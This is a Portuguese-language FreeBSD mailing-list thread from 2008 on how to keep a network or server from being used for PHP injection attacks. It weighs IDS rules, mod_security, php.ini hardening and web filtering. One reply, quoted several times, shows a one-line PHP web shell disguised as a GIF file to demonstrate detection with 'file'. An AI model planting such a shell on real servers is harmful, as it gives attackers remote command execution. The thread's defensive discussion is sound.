Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico William Grzybowski
Oi Patrick,

Não sei se entendi muito bem, poderia me dar uma luz?
Php injection, como próprio nome ja diz é a inserção de codigo php
causado por código mal escrito que permito o injeção de código php
externo no servidor, correto?

Como que funcionam essas regras que você falou? Essas empresas liberam
regras que atuam (obviamente) na camada do HTTP e analizam o
trafego para os softwares vulneraveis que eles tem conhecimento e
inclusao direta de scripts em servidores externos?

Vlw

2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
 Cristina Fernandes Silva escreveu:

  É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
   ? ou somente as regras que posso usar no snort.

  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
  precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
  não importa se é uma multinacional, pagara como pequeno. No site da
  SourceFire tem todos os detalhes sobre preços.

  São só as regras a principio, mas pode comprar o sistema deles. Não
  conheço quem use no país o sistema deles. Mas não parece ser mais do que
  o Snort com um front-end muito amigável.

  No caso da Juniper tem direito automaticamente a versão convertida pra
  Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS
  (que é um add-on no firewall Juniper).

  No Brasil quem representa a venda das assinaturas Source Fire é a
  BRConnection.



  
  
  
   Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu:
   Cristina Fernandes Silva escreveu:
  
   Acho que não fui clara, Vou explicar,

 Quero evitar que alguem da minha rede use o meu ip  (endereço ) para
 fazer ataques
 de php injection para outro endereço externo. Até mesmo os meus
 usuarios interno fazer algum ataque para servidores externos..
  
  
   Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de
satisfação vai depender da qualidade das regras de análise de instrusão
que você utilizar. Isso quer dizer que dependendo do nível de seriedade
da empresa será proveitoso assinar um serviço (comercial) que oferece
regras testadas e atualizadas. Apesar da escolha natural ser Source
Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela
Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro
Snort.
  
   -
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
  
   -
   Histórico: http://www.fug.com.br/historico/html/freebsd/
   Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

  -
  Histórico: http://www.fug.com.br/historico/html/freebsd/
  Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




-- 
William Grzybowski
--
Jabber: william88 at gmail dot com
Curitiba/PR - Brazil
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Marcelo M. Fleury
Olá,

até onde eu entendi, o interesse da Cristina é em não ser uma provedora de
códigos maliciosos, no caso PHP.

Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques
a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na
realidade não conheço solução voltada para isso... existe o mod_security do
apache que pode te ajudar a monitorar e filtrar suas aplicações.

Penso em algum programa que cheque a integridade de arquivos no servidor,
algo parecido com o file:

[EMAIL PROTECTED]:~$ cat sh.gif
?php
system($_GET['sh']);
?
[EMAIL PROTECTED]:~$ file sh.gif
sh.gif: PHP script text

e depois, habilitar alguns filtros no mod_security buscando checar qualquer
uso indevido do php... confesso que não conheço muito o mod_security, uma
vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar
um tempo para brincar com ele).

Acredito que no mais é realizar auditorias... procurar nos logs do apache
por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não
resolva!

Espero ter ajudado, boa sorte!


Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:

 Oi Patrick,

 Não sei se entendi muito bem, poderia me dar uma luz?
 Php injection, como próprio nome ja diz é a inserção de codigo php
 causado por código mal escrito que permito o injeção de código php
 externo no servidor, correto?

 Como que funcionam essas regras que você falou? Essas empresas liberam
 regras que atuam (obviamente) na camada do HTTP e analizam o
 trafego para os softwares vulneraveis que eles tem conhecimento e
 inclusao direta de scripts em servidores externos?

 Vlw

 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:

  Cristina Fernandes Silva escreveu:
 
   É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
? ou somente as regras que posso usar no snort.
 
   Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
   precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
   não importa se é uma multinacional, pagara como pequeno. No site da
   SourceFire tem todos os detalhes sobre preços.
 
   São só as regras a principio, mas pode comprar o sistema deles. Não
   conheço quem use no país o sistema deles. Mas não parece ser mais do
 que
   o Snort com um front-end muito amigável.
 
   No caso da Juniper tem direito automaticamente a versão convertida pra
   Snort todos que tem Juniper série 5000 e já pague a licença anual do
 IPS
   (que é um add-on no firewall Juniper).
 
   No Brasil quem representa a venda das assinaturas Source Fire é a
   BRConnection.
 
 
 
   
   
   
Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED]
 escreveu:
Cristina Fernandes Silva escreveu:
   
Acho que não fui clara, Vou explicar,
 
  Quero evitar que alguem da minha rede use o meu ip  (endereço )
 para
  fazer ataques
  de php injection para outro endereço externo. Até mesmo os meus
  usuarios interno fazer algum ataque para servidores externos..
   
   
Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível
 de
 satisfação vai depender da qualidade das regras de análise de
 instrusão
 que você utilizar. Isso quer dizer que dependendo do nível de
 seriedade
 da empresa será proveitoso assinar um serviço (comercial) que
 oferece
 regras testadas e atualizadas. Apesar da escolha natural ser Source
 Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas
 pela
 Juniper. São as mesmas utilizadas no Juniper série 5000,
 convertidas pro
 Snort.
   
-
 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
   
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
 
   -
   Histórico: http://www.fug.com.br/historico/html/freebsd/
   Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
 




 --

 William Grzybowski
 --
 Jabber: william88 at gmail dot com
 Curitiba/PR - Brazil
 -

 Histórico: http://www.fug.com.br/historico/html/freebsd/
 Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd




-- 
Att, Marcelo M. Fleury
Linux User: #369521
Blog - http://marcelomf.blogspot.com/

Não basta saber, é preciso também aplicar; não basta querer é preciso
também agir By Goethe
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd


Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Gustavo Polillo Correa

no php.ini vc pode fazer :

disable_functions = system,exec

isso fara com que o php nao execute as funcoes system() e nem exec().. dando
maior seguranca a ataques desse tipo.. outras variaveis interessantes para
prover maior seguranca no php sao:

safe_mode= On
safe_mode_gid=Off
expose_php=Off
register_globals=Off (sem comentarios.. rsrs)
dispaly_error=Off
log_eroor=On
error_log=php_erro.log

Considerando que seu php nao emitira erros, vale ainda configurar o apache:

trocar :
AddType application/x-httpd-php .php

Por:
AddType application/x-httpd-php .jsp

Ou
AddType application/x-httpd-php .dhmtl

Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso
dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara que
é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar a
variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc sta
usando..

isso ajuda mas nao evita ataques contra programacao mal feita!! 

modsecurity do apache é muito bom... acho que todos deveriam ter... com bons
filtros.. ajuda muuuito!!

ate.

Gustavo Polillo Correa.




-- Original Message ---
From: Marcelo M. Fleury [EMAIL PROTECTED]
To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br
Sent: Fri, 22 Feb 2008 09:59:32 -0300
Subject: Re: [FUG-BR] OT-Ataque PHP injection

 Olá,
 
 até onde eu entendi, o interesse da Cristina é em não ser uma 
 provedora de códigos maliciosos, no caso PHP.
 
 Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques
 a rede/host, e sim de que a rede ou host seja uma provedora de 
 ataques... na realidade não conheço solução voltada para isso... 
 existe o mod_security do apache que pode te ajudar a monitorar e 
 filtrar suas aplicações.
 
 Penso em algum programa que cheque a integridade de arquivos no 
 servidor, algo parecido com o file:
 
 [EMAIL PROTECTED]:~$ cat sh.gif
 ?php
 system($_GET['sh']);
 ?
 [EMAIL PROTECTED]:~$ file sh.gif
 sh.gif: PHP script text
 
 e depois, habilitar alguns filtros no mod_security buscando checar qualquer
 uso indevido do php... confesso que não conheço muito o mod_security,
  uma vez que não trampo mais como sysadmin e sim como 
 desenvolvedor(quero arrumar um tempo para brincar com ele).
 
 Acredito que no mais é realizar auditorias... procurar nos logs do apache
 por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,
 awk não resolva!
 
 Espero ter ajudado, boa sorte!
 
 Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:
 
  Oi Patrick,
 
  Não sei se entendi muito bem, poderia me dar uma luz?
  Php injection, como próprio nome ja diz é a inserção de codigo php
  causado por código mal escrito que permito o injeção de código php
  externo no servidor, correto?
 
  Como que funcionam essas regras que você falou? Essas empresas liberam
  regras que atuam (obviamente) na camada do HTTP e analizam o
  trafego para os softwares vulneraveis que eles tem conhecimento e
  inclusao direta de scripts em servidores externos?
 
  Vlw
 
  2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
 
   Cristina Fernandes Silva escreveu:
  
É cobrada essas regras ? Vc tem alguma faixa de preço  ? é apllicance
 ? ou somente as regras que posso usar no snort.
  
Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte,
não importa se é uma multinacional, pagara como pequeno. No site da
SourceFire tem todos os detalhes sobre preços.
  
São só as regras a principio, mas pode comprar o sistema deles. Não
conheço quem use no país o sistema deles. Mas não parece ser mais do
  que
o Snort com um front-end muito amigável.
  
No caso da Juniper tem direito automaticamente a versão convertida pra
Snort todos que tem Juniper série 5000 e já pague a licença anual do
  IPS
(que é um add-on no firewall Juniper).
  
No Brasil quem representa a venda das assinaturas Source Fire é a
BRConnection.
  
  
  



 Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED]
  escreveu:
 Cristina Fernandes Silva escreveu:

 Acho que não fui clara, Vou explicar,
  
   Quero evitar que alguem da minha rede use o meu ip  (endereço )
  para
   fazer ataques
   de php injection para outro endereço externo. Até mesmo os meus
   usuarios interno fazer algum ataque para servidores externos..


 Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível
  de
  satisfação vai depender da qualidade das regras de análise de
  instrusão
  que você utilizar. Isso quer dizer que dependendo do nível de
  seriedade
  da empresa será proveitoso assinar um serviço (comercial) que
  oferece
  regras testadas e atualizadas. Apesar da escolha natural ser Source
  Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas
  pela
  Juniper. São as mesmas utilizadas

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Gustavo Polillo Correa

opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o
banner do apache e do SO tbm... :)


-- Original Message ---
From: Marcelo M. Fleury [EMAIL PROTECTED]
To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br
Sent: Fri, 22 Feb 2008 11:10:56 -0300
Subject: Re: [FUG-BR] OT-Ataque PHP injection

 Bom,
 
 a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer
 isso, a maioria das respostas é como evitar os ataques, mas eu 
 entendi que ela quer garantir que em seu servidor não tenha códigos 
 maliciosos, capazes de prover ataques em OUTROS servidores e não no dela...
 
 Gustavo, acrescentaria na sua lista o magic_quotes_gpc de 
 qualquer formar, acredito que todas devem ser analisadas, buscando 
 mensurar o impacto nos sistemas existentes...
 
 com relação a alterar a extensão do php, não sei até que ponto isso é
 valido... teria que se alterar o banner do apache também, dentre outras
 coisas( eu acho )... ataques de footprint são cada vez mais sofisticados...
 
 []s
 
 Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu:
 
 
  no php.ini vc pode fazer :
 
  disable_functions = system,exec
 
  isso fara com que o php nao execute as funcoes system() e nem exec()..
  dando
  maior seguranca a ataques desse tipo.. outras variaveis interessantes para
  prover maior seguranca no php sao:
 
  safe_mode= On
  safe_mode_gid=Off
  expose_php=Off
  register_globals=Off (sem comentarios.. rsrs)
  dispaly_error=Off
  log_eroor=On
  error_log=php_erro.log
 
  Considerando que seu php nao emitira erros, vale ainda configurar o
  apache:
 
  trocar :
  AddType application/x-httpd-php .php
 
  Por:
  AddType application/x-httpd-php .jsp
 
  Ou
  AddType application/x-httpd-php .dhmtl
 
  Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso
  dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara
  que
  é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar
  a
  variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc
  sta
  usando..
 
  isso ajuda mas nao evita ataques contra programacao mal feita!!
 
  modsecurity do apache é muito bom... acho que todos deveriam ter... com
  bons
  filtros.. ajuda muuuito!!
 
  ate.
 
  Gustavo Polillo Correa.
 
 
 
 
 
  -- Original Message ---
  From: Marcelo M. Fleury [EMAIL PROTECTED]
  To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
  freebsd@fug.com.br
  Sent: Fri, 22 Feb 2008 09:59:32 -0300
  Subject: Re: [FUG-BR] OT-Ataque PHP injection
 
   Olá,
  
   até onde eu entendi, o interesse da Cristina é em não ser uma
   provedora de códigos maliciosos, no caso PHP.
  
   Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
  ataques
   a rede/host, e sim de que a rede ou host seja uma provedora de
   ataques... na realidade não conheço solução voltada para isso...
   existe o mod_security do apache que pode te ajudar a monitorar e
   filtrar suas aplicações.
  
   Penso em algum programa que cheque a integridade de arquivos no
   servidor, algo parecido com o file:
  
   [EMAIL PROTECTED]:~$ cat sh.gif
   ?php
   system($_GET['sh']);
   ?
   [EMAIL PROTECTED]:~$ file sh.gif
   sh.gif: PHP script text
  
   e depois, habilitar alguns filtros no mod_security buscando checar
  qualquer
   uso indevido do php... confesso que não conheço muito o mod_security,
uma vez que não trampo mais como sysadmin e sim como
   desenvolvedor(quero arrumar um tempo para brincar com ele).
  
   Acredito que no mais é realizar auditorias... procurar nos logs do
  apache
   por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,
   awk não resolva!
  
   Espero ter ajudado, boa sorte!
  
   Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:
   
Oi Patrick,
   
Não sei se entendi muito bem, poderia me dar uma luz?
Php injection, como próprio nome ja diz é a inserção de codigo php
causado por código mal escrito que permito o injeção de código php
externo no servidor, correto?
   
Como que funcionam essas regras que você falou? Essas empresas liberam
regras que atuam (obviamente) na camada do HTTP e analizam o
trafego para os softwares vulneraveis que eles tem conhecimento e
inclusao direta de scripts em servidores externos?
   
Vlw
   
2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
   
 Cristina Fernandes Silva escreveu:

  É cobrada essas regras ? Vc tem alguma faixa de preço  ? é
  apllicance
   ? ou somente as regras que posso usar no snort.

  Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
  precos. Eles confiam no que voce diz: Se voce diz que é pequeno
  porte,
  não importa se é uma multinacional, pagara como pequeno. No site da
  SourceFire tem todos os detalhes sobre preços.

  São só as regras a principio, mas pode comprar o sistema deles. Não

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Cristina Fernandes Silva
Olha pessoal é como evitar prover ataques originados do meu servidor.

Em 22/02/08, Gustavo Polillo Correa[EMAIL PROTECTED] escreveu:

  opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o
  banner do apache e do SO tbm... :)



  -- Original Message ---
  From: Marcelo M. Fleury [EMAIL PROTECTED]
  To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
 freebsd@fug.com.br

 Sent: Fri, 22 Feb 2008 11:10:56 -0300
  Subject: Re: [FUG-BR] OT-Ataque PHP injection

   Bom,
  
   a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer
   isso, a maioria das respostas é como evitar os ataques, mas eu
   entendi que ela quer garantir que em seu servidor não tenha códigos
   maliciosos, capazes de prover ataques em OUTROS servidores e não no dela...
  
   Gustavo, acrescentaria na sua lista o magic_quotes_gpc de
   qualquer formar, acredito que todas devem ser analisadas, buscando
   mensurar o impacto nos sistemas existentes...
  
   com relação a alterar a extensão do php, não sei até que ponto isso é
   valido... teria que se alterar o banner do apache também, dentre outras
   coisas( eu acho )... ataques de footprint são cada vez mais sofisticados...
  
   []s
  
   Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu:
   
   
no php.ini vc pode fazer :
   
disable_functions = system,exec
   
isso fara com que o php nao execute as funcoes system() e nem exec()..
dando
maior seguranca a ataques desse tipo.. outras variaveis interessantes 
 para
prover maior seguranca no php sao:
   
safe_mode= On
safe_mode_gid=Off
expose_php=Off
register_globals=Off (sem comentarios.. rsrs)
dispaly_error=Off
log_eroor=On
error_log=php_erro.log
   
Considerando que seu php nao emitira erros, vale ainda configurar o
apache:
   
trocar :
AddType application/x-httpd-php .php
   
Por:
AddType application/x-httpd-php .jsp
   
Ou
AddType application/x-httpd-php .dhmtl
   
Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso
dificultara ao atacante qual a tecnologia que vc esta usando.. ele 
 pensara
que
é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar
a
variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc
sta
usando..
   
isso ajuda mas nao evita ataques contra programacao mal feita!!
   
modsecurity do apache é muito bom... acho que todos deveriam ter... com
bons
filtros.. ajuda muuuito!!
   
ate.
   
Gustavo Polillo Correa.
   
   
   
   
   
-- Original Message ---
From: Marcelo M. Fleury [EMAIL PROTECTED]
To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
freebsd@fug.com.br
Sent: Fri, 22 Feb 2008 09:59:32 -0300
Subject: Re: [FUG-BR] OT-Ataque PHP injection
   
 Olá,

 até onde eu entendi, o interesse da Cristina é em não ser uma
 provedora de códigos maliciosos, no caso PHP.

 Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
ataques
 a rede/host, e sim de que a rede ou host seja uma provedora de
 ataques... na realidade não conheço solução voltada para isso...
 existe o mod_security do apache que pode te ajudar a monitorar e
 filtrar suas aplicações.

 Penso em algum programa que cheque a integridade de arquivos no
 servidor, algo parecido com o file:

 [EMAIL PROTECTED]:~$ cat sh.gif
 ?php
 system($_GET['sh']);
 ?
 [EMAIL PROTECTED]:~$ file sh.gif
 sh.gif: PHP script text

 e depois, habilitar alguns filtros no mod_security buscando checar
qualquer
 uso indevido do php... confesso que não conheço muito o mod_security,
  uma vez que não trampo mais como sysadmin e sim como
 desenvolvedor(quero arrumar um tempo para brincar com ele).

 Acredito que no mais é realizar auditorias... procurar nos logs do
apache
 por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,
 awk não resolva!

 Espero ter ajudado, boa sorte!

 Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:
 
  Oi Patrick,
 
  Não sei se entendi muito bem, poderia me dar uma luz?
  Php injection, como próprio nome ja diz é a inserção de codigo php
  causado por código mal escrito que permito o injeção de código php
  externo no servidor, correto?
 
  Como que funcionam essas regras que você falou? Essas empresas 
 liberam
  regras que atuam (obviamente) na camada do HTTP e analizam o
  trafego para os softwares vulneraveis que eles tem conhecimento e
  inclusao direta de scripts em servidores externos?
 
  Vlw
 
  2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
 
   Cristina Fernandes Silva escreveu:
  
É cobrada essas regras ? Vc tem alguma faixa de preço  ? é
apllicance

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Marcelo M. Fleury
Bom,

a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer
isso, a maioria das respostas é como evitar os ataques, mas eu entendi que
ela quer garantir que em seu servidor não tenha códigos maliciosos, capazes
de prover ataques em OUTROS servidores e não no dela...

Gustavo, acrescentaria na sua lista o magic_quotes_gpc de qualquer
formar, acredito que todas devem ser analisadas, buscando mensurar o impacto
nos sistemas existentes...

com relação a alterar a extensão do php, não sei até que ponto isso é
valido... teria que se alterar o banner do apache também, dentre outras
coisas( eu acho )... ataques de footprint são cada vez mais sofisticados...

[]s

Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu:


 no php.ini vc pode fazer :

 disable_functions = system,exec

 isso fara com que o php nao execute as funcoes system() e nem exec()..
 dando
 maior seguranca a ataques desse tipo.. outras variaveis interessantes para
 prover maior seguranca no php sao:

 safe_mode= On
 safe_mode_gid=Off
 expose_php=Off
 register_globals=Off (sem comentarios.. rsrs)
 dispaly_error=Off
 log_eroor=On
 error_log=php_erro.log

 Considerando que seu php nao emitira erros, vale ainda configurar o
 apache:

 trocar :
 AddType application/x-httpd-php .php

 Por:
 AddType application/x-httpd-php .jsp

 Ou
 AddType application/x-httpd-php .dhmtl

 Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso
 dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara
 que
 é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar
 a
 variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc
 sta
 usando..

 isso ajuda mas nao evita ataques contra programacao mal feita!!

 modsecurity do apache é muito bom... acho que todos deveriam ter... com
 bons
 filtros.. ajuda muuuito!!

 ate.

 Gustavo Polillo Correa.





 -- Original Message ---
 From: Marcelo M. Fleury [EMAIL PROTECTED]
 To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
 freebsd@fug.com.br
 Sent: Fri, 22 Feb 2008 09:59:32 -0300
 Subject: Re: [FUG-BR] OT-Ataque PHP injection

  Olá,
 
  até onde eu entendi, o interesse da Cristina é em não ser uma
  provedora de códigos maliciosos, no caso PHP.
 
  Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
 ataques
  a rede/host, e sim de que a rede ou host seja uma provedora de
  ataques... na realidade não conheço solução voltada para isso...
  existe o mod_security do apache que pode te ajudar a monitorar e
  filtrar suas aplicações.
 
  Penso em algum programa que cheque a integridade de arquivos no
  servidor, algo parecido com o file:
 
  [EMAIL PROTECTED]:~$ cat sh.gif
  ?php
  system($_GET['sh']);
  ?
  [EMAIL PROTECTED]:~$ file sh.gif
  sh.gif: PHP script text
 
  e depois, habilitar alguns filtros no mod_security buscando checar
 qualquer
  uso indevido do php... confesso que não conheço muito o mod_security,
   uma vez que não trampo mais como sysadmin e sim como
  desenvolvedor(quero arrumar um tempo para brincar com ele).
 
  Acredito que no mais é realizar auditorias... procurar nos logs do
 apache
  por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,
  awk não resolva!
 
  Espero ter ajudado, boa sorte!
 
  Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu:
  
   Oi Patrick,
  
   Não sei se entendi muito bem, poderia me dar uma luz?
   Php injection, como próprio nome ja diz é a inserção de codigo php
   causado por código mal escrito que permito o injeção de código php
   externo no servidor, correto?
  
   Como que funcionam essas regras que você falou? Essas empresas liberam
   regras que atuam (obviamente) na camada do HTTP e analizam o
   trafego para os softwares vulneraveis que eles tem conhecimento e
   inclusao direta de scripts em servidores externos?
  
   Vlw
  
   2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]:
  
Cristina Fernandes Silva escreveu:
   
 É cobrada essas regras ? Vc tem alguma faixa de preço  ? é
 apllicance
  ? ou somente as regras que posso usar no snort.
   
 Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios
 precos. Eles confiam no que voce diz: Se voce diz que é pequeno
 porte,
 não importa se é uma multinacional, pagara como pequeno. No site da
 SourceFire tem todos os detalhes sobre preços.
   
 São só as regras a principio, mas pode comprar o sistema deles. Não
 conheço quem use no país o sistema deles. Mas não parece ser mais
 do
   que
 o Snort com um front-end muito amigável.
   
 No caso da Juniper tem direito automaticamente a versão convertida
 pra
 Snort todos que tem Juniper série 5000 e já pague a licença anual
 do
   IPS
 (que é um add-on no firewall Juniper).
   
 No Brasil quem representa a venda das assinaturas Source Fire é a
 BRConnection.
   
   
   
 
 
 
  Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Welkson Renny de Medeiros
Bom dia Cristina!


Só respondendo a William: ela quer evitar que os usuários da rede dela façam 
ataque de sql injection usando o servidor dela...

O IDS como Patrick falou seria uma boa solução...

Uma outra que pensei... um filtro web também não ajudaria? tipo: um bloqueio 
via squid ou dansguardian nas strings select, where, delete from... isso 
teria que ser bastante analisado para não gerar falsos alertas... mas é uma 
possibilidade.

O que acham?

Abraço,


-- 
Welkson Renny de Medeiros
Focus Automação Comercial
Desenvolvimento / Gerência de Redes
[EMAIL PROTECTED]



  Powered by 

   (__)
\\\'',)
  \/  \ ^
  .\._/_)

  www.FreeBSD.org

- Original Message - 
From: Cristina Fernandes Silva [EMAIL PROTECTED]
To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
freebsd@fug.com.br
Sent: Friday, February 22, 2008 11:23 AM
Subject: Re: [FUG-BR] OT-Ataque PHP injection


Olha pessoal é como evitar prover ataques originados do meu servidor.

Em 22/02/08, Gustavo Polillo Correa[EMAIL PROTECTED] escreveu:

  opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o
  banner do apache e do SO tbm... :)



  -- Original Message ---
  From: Marcelo M. Fleury [EMAIL PROTECTED]
  To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
 freebsd@fug.com.br

 Sent: Fri, 22 Feb 2008 11:10:56 -0300
  Subject: Re: [FUG-BR] OT-Ataque PHP injection

   Bom,
  
   a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom 
 esclarecer
   isso, a maioria das respostas é como evitar os ataques, mas eu
   entendi que ela quer garantir que em seu servidor não tenha códigos
   maliciosos, capazes de prover ataques em OUTROS servidores e não no 
 dela...
  
   Gustavo, acrescentaria na sua lista o magic_quotes_gpc de
   qualquer formar, acredito que todas devem ser analisadas, buscando
   mensurar o impacto nos sistemas existentes...
  
   com relação a alterar a extensão do php, não sei até que ponto isso é
   valido... teria que se alterar o banner do apache também, dentre outras
   coisas( eu acho )... ataques de footprint são cada vez mais 
 sofisticados...
  
   []s
  
   Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu:
   
   
no php.ini vc pode fazer :
   
disable_functions = system,exec
   
isso fara com que o php nao execute as funcoes system() e nem 
 exec()..
dando
maior seguranca a ataques desse tipo.. outras variaveis interessantes 
 para
prover maior seguranca no php sao:
   
safe_mode= On
safe_mode_gid=Off
expose_php=Off
register_globals=Off (sem comentarios.. rsrs)
dispaly_error=Off
log_eroor=On
error_log=php_erro.log
   
Considerando que seu php nao emitira erros, vale ainda configurar o
apache:
   
trocar :
AddType application/x-httpd-php .php
   
Por:
AddType application/x-httpd-php .jsp
   
Ou
AddType application/x-httpd-php .dhmtl
   
Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso
dificultara ao atacante qual a tecnologia que vc esta usando.. ele 
 pensara
que
é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc 
 deixar
a
variavel display_error=On, qdo der um erro.. o cara ja vai saber o 
 que vc
sta
usando..
   
isso ajuda mas nao evita ataques contra programacao mal feita!!
   
modsecurity do apache é muito bom... acho que todos deveriam ter... 
 com
bons
filtros.. ajuda muuuito!!
   
ate.
   
Gustavo Polillo Correa.
   
   
   
   
   
-- Original Message ---
From: Marcelo M. Fleury [EMAIL PROTECTED]
To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) 
freebsd@fug.com.br
Sent: Fri, 22 Feb 2008 09:59:32 -0300
Subject: Re: [FUG-BR] OT-Ataque PHP injection
   
 Olá,

 até onde eu entendi, o interesse da Cristina é em não ser uma
 provedora de códigos maliciosos, no caso PHP.

 Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de
ataques
 a rede/host, e sim de que a rede ou host seja uma provedora de
 ataques... na realidade não conheço solução voltada para isso...
 existe o mod_security do apache que pode te ajudar a monitorar e
 filtrar suas aplicações.

 Penso em algum programa que cheque a integridade de arquivos no
 servidor, algo parecido com o file:

 [EMAIL PROTECTED]:~$ cat sh.gif
 ?php
 system($_GET['sh']);
 ?
 [EMAIL PROTECTED]:~$ file sh.gif
 sh.gif: PHP script text

 e depois, habilitar alguns filtros no mod_security buscando checar
qualquer
 uso indevido do php... confesso que não conheço muito o 
 mod_security,
  uma vez que não trampo mais como sysadmin e sim como

Re: [FUG-BR] OT-Ataque PHP injection

2008-02-22 Por tôpico Patrick Tracanelli
Marcelo M. Fleury escreveu:
 Olá,
 
 até onde eu entendi, o interesse da Cristina é em não ser uma provedora de
 códigos maliciosos, no caso PHP.

Então entendemos coisas distintas. Ao meu ver ela nao quer q usuarios 
internos façam ataque de injection em qualquer q seja o destino/alvo.

 
 Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques
 a rede/host, e sim de que a rede ou host seja uma provedora de ataques...

E qual é a diferença? Sendo um IDS de rede, sua função é filtrar os 2 
fluxos, o que sai e o que entra na/da rede. Ainda não entendi a 
relutancia hehe.

  na
